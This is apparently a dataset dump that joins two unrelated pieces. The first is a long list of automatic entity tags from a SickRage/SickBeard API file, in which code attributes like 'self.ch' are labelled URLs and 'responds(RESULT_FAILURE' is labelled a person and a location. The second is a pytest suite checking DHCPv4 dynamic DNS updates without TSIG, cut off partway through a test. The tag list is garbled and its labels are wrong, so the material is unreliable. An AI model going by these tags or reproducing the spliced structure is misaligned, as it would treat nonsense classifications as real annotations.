'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'sickbeard.showQueueScheduler.action.updateShow(show_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', '1900'], ['PERSON', 'CMD_SickBeardDeleteRootDir'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'sickrage.helper.com'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.show.Com'], ['URL', 'sickrage.sh'], ['URL', 'sickrage.show.Sh'], ['URL', 'sickrage.system.Re'], ['URL', 'sickrage.system.Sh'], ['URL', 'sickbeard.ve'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'Api.de'], ['URL', 'Api.de'], ['URL', 'self.se'], ['URL', 'self.request.ar'], ['URL', 'kwargs.it'], ['URL', 'self.request.re'], ['URL', 'logger.DE'], ['URL', 'self.ca'], ['URL', 'logger.ER'], ['URL', 'self.fi'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'traceback.fo'], ['URL', 'logger.DE'], ['URL', 'logger.DE'], ['URL', 'logger.DE'], ['URL', 'self.fi'], ['URL', 'logger.DE'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'mapper.ge'], ['URL', 'show.in'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'asd.in'], ['URL', 'show.se'], ['URL', '2.in'], ['URL', 'show.se'], ['URL', 'kwarg.fi'], ['URL', 'self.ru'], ['URL', 'self.re'], ['URL', 'self.ru'], ['URL', 'self.re'], ['URL', 'self.in'], ['URL', 'ids.in'], ['URL', 'kwargs.ge'], ['URL', 'kwargs.ge'], ['URL', 'logger.ER'], ['URL', 'self.kw'], ['URL', 'self.si'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.si'], ['URL', 'self.kw'], ['URL', 'self.kw'], ['URL', 'self.kw'], ['URL', 'datetime.date.fr'], ['URL', 'date.st'], ['URL', 'datetime.date.fr'], ['URL', 'date.st'], ['URL', 'datetime.datetime.st'], ['URL', 'date.st'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'os.li'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'mapper.ke'], ['URL', 'self.su'], ['URL', 'mapper.ge'], ['URL', 'self.su'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'ComingEpisodes.sorts.ke'], ['URL', 'self.ch'], ['URL', 'ComingEpisodes.ca'], ['URL', 'ComingEpisodes.ca'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'sickbeard.COM'], ['URL', 'ComingEpisodes.ge'], ['URL', 'self.so'], ['URL', 'self.pa'], ['URL', 'episodes.ke'], ['URL', 'episodes.it'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'queue.Ma'], ['URL', 'sickbeard.searchQueueScheduler.action.ad'], ['URL', 'item.su'], ['URL', 'time.sl'], ['URL', 'item.su'], ['URL', 'obj.st'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.fo'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'ep.se'], ['URL', 'ep.st'], ['URL', 'self.st'], ['URL', 'obj.se'], ['URL', 'obj.se'], ['URL', 'obj.se'], ['URL', 'obj.st'], ['URL', 'self.st'], ['URL', 'sickbeard.US'], ['URL', 'obj.st'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'self.fo'], ['URL', 'obj.st'], ['URL', 'self.st'], ['URL', 'obj.ge'], ['URL', 'self.st'], ['URL', 'db.ma'], ['URL', 'segments.it'], ['URL', 'queue.Ba'], ['URL', 'sickbeard.searchQueueScheduler.action.ad'], ['URL', 'obj.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'obj.su'], ['URL', 'obj.do'], ['URL', 'obj.su'], ['URL', 'subtitles.na'], ['URL', 'ui.notifications.me'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'self.li'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.li'], ['URL', 'os.pa'], ['URL', 'os.path.ba'], ['URL', 'self.li'], ['URL', 'self.ch'], ['URL', 'self.li'], ['URL', 'db.se'], ['URL', 'db.se'], ['URL', 'sickbeard.sh'], ['URL', 'db.se'], ['URL', 'shows.pa'], ['URL', 'episodes.sh'], ['URL', 'shows.in'], ['URL', 'curShow.in'], ['URL', 'curShow.ge'], ['URL', 'curShow.in'], ['URL', 'curShow.na'], ['URL', 'curShow.st'], ['URL', 'self.ch'], ['URL', 'logger.re'], ['URL', 'os.path.is'], ['URL', 'f.re'], ['URL', 're.ma'], ['URL', 'match.gr'], ['URL', 'logger.re'], ['URL', 'logger.re'], ['URL', 'x.rs'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'self.fo'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.ch'], ['URL', 'self.pro'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'sickbeard.TV'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'sickbeard.TV'], ['URL', 'processTV.pro'], ['URL', 'self.pa'], ['URL', 'self.pro'], ['URL', 'self.fo'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'sickbeard.BR'], ['URL', 'self.ve'], ['URL', 'mapper.ke'], ['URL', 'self.ch'], ['URL', 'self.de'], ['URL', 'self.ch'], ['URL', 'os.path.is'], ['URL', 'sickbeard.RO'], ['URL', 'self.de'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'self.de'], ['URL', 'dirs.in'], ['URL', 'self.de'], ['URL', 'dirs.in'], ['URL', 'sickbeard.RO'], ['URL', 'version.ch'], ['URL', 'version.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'db.se'], ['URL', 'sickbeard.searchQueueScheduler.action.is'], ['URL', 'sickbeard.searchQueueScheduler.action.is'], ['URL', 'sickbeard.backlogSearchScheduler.ne'], ['URL', 'sickbeard.SY'], ['URL', 'self.ch'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'new.in'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.ST'], ['URL', 'sickbeard.COM'], ['URL', 'ui.notifications.ge'], ['URL', 'self.rh.request.re'], ['URL', 'notification.me'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'sickbeard.searchQueueScheduler.action.pa'], ['URL', 'sickbeard.searchQueueScheduler.ac'], ['URL', 'sickbeard.st'], ['URL', 'Restart.re'], ['URL', 'thetvdb.com'], ['URL', 'self.va'], ['URL', 'sickbeard.in'], ['URL', 'self.na'], ['URL', 'self.ch'], ['URL', 'self.la'], ['URL', 'self.ch'], ['URL', 'sickbeard.IN'], ['URL', 'self.va'], ['URL', 'languages.ke'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.va'], ['URL', 'self.la'], ['URL', 'self.na'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'params.co'], ['URL', 'self.la'], ['URL', 'self.la'], ['URL', 'sickbeard.IN'], ['URL', 'self.la'], ['URL', 'classes.Al'], ['URL', 'sickbeard.in'], ['URL', 'self.na'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'params.co'], ['URL', 'self.la'], ['URL', 'self.la'], ['URL', 'sickbeard.IN'], ['URL', 'self.la'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'logger.DE'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'sickbeard.ST'], ['URL', 'self.st'], ['URL', 'sickbeard.COM'], ['URL', 'Shutdown.st'], ['URL', 'version.ch'], ['URL', 'version.ru'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.la'], ['URL', 'obj.na'], ['URL', 'obj.pa'], ['URL', 'obj.su'], ['URL', 'obj.ai'], ['URL', 'obj.an'], ['URL', 'obj.ai'], ['URL', 'obj.sc'], ['URL', 'obj.ar'], ['URL', 'obj.in'], ['URL', 'helpers.ma'], ['URL', 'obj.im'], ['URL', 'obj.net'], ['URL', 'obj.st'], ['URL', 'helpers.tr'], ['URL', 'obj.ne'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ne'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'sickbeard.US'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'os.path.is'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'sickbeard.showQueueScheduler.action.ad'], ['URL', 'self.in'], ['URL', 'sickbeard.ST'], ['URL', 'self.su'], ['URL', 'sickbeard.ST'], ['URL', 'self.ar'], ['URL', 'thetvdb.com'], ['URL', 'self.va'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'self.la'], ['URL', 'self.ch'], ['URL', 'sickbeard.IN'], ['URL', 'self.va'], ['URL', 'languages.ke'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'sickbeard.US'], ['URL', 'self.an'], ['URL', 'self.ch'], ['URL', 'sickbeard.AN'], ['URL', 'self.sc'], ['URL', 'self.ch'], ['URL', 'sickbeard.SC'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'sickbeard.AR'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'os.path.is'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'sickbeard.ST'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'sickbeard.ST'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'sickbeard.AD'], ['URL', 'config.in'], ['URL', 'helpers.ma'], ['URL', 'logger.ER'], ['URL', 'helpers.ch'], ['URL', 'sickbeard.showQueueScheduler.action.ad'], ['URL', 'self.in'], ['URL', 'self.la'], ['URL', 'self.su'], ['URL', 'self.an'], ['URL', 'self.sc'], ['URL', 'self.ar'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'show.ca'], ['URL', 'cache.Im'], ['URL', 'os.path.is'], ['URL', 'obj.in'], ['URL', 'os.path.is'], ['URL', 'obj.ba'], ['URL', 'obj.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.ch'], ['URL', 'Show.de'], ['URL', 'self.in'], ['URL', 'self.re'], ['URL', 'show.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'Show.pa'], ['URL', 'self.in'], ['URL', 'self.pa'], ['URL', 'show.na'], ['URL', 'show.pa'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.re'], ['URL', 'self.in'], ['URL', 'show.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.so'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.se'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'obj.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.NO'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'Quality.NO'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'sickbeard.showQueueScheduler.ac'], ['URL', 'obj.na'], ['URL', 'logger.DE'], ['URL', 'obj.na'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'sickbeard.sh'], ['URL', 'self.pa'], ['URL', 'curShow.pa'], ['URL', 'helpers.ma'], ['URL', 'curShow.pa'], ['URL', 'curShow.la'], ['URL', 'curShow.ai'], ['URL', 'curShow.an'], ['URL', 'curShow.in'], ['URL', 'curShow.net'], ['URL', 'curShow.na'], ['URL', 'curShow.st'], ['URL', 'curShow.su'], ['URL', 'helpers.tr'], ['URL', 'curShow.ne'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'curShow.ne'], ['URL', 'curShow.ai'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'curShow.in'], ['URL', 'self.so'], ['URL', 'curShow.na'], ['URL', 'curShow.in'], ['URL', 'episode.se'], ['URL', 'episode.se'], ['URL', 'episode.su'], ['URL', 'history.cl'], ['URL', 'history.tr'], ['URL', 'sb.ad'], ['URL', 'sb.ch'], ['URL', 'sb.ch'], ['URL', 'sb.de'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.pa'], ['URL', 'sb.re'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.sh'], ['URL', 'show.ad'], ['URL', 'show.ad'], ['URL', 'show.ca'], ['URL', 'show.de'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.pa'], ['URL', 'show.re'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.st'], ['URL', 'shows.st']] |
12 | """DDNS without TSIG"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_control
import srv_msg
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_add_success_Sflag():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_add_fail_Sflag():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.exae.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.exae.com.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_notenabled_Sflag():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', False)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '127.0.0.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
srv_msg.response_check_include_option(81)
# Response option 81 MUST contain flags 10. #later make it 's' 'n' and 'o' should be 10
srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_update
def test_ddns4_notsig_forw_and_rev_update_success_Sflag():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'four')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(20)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
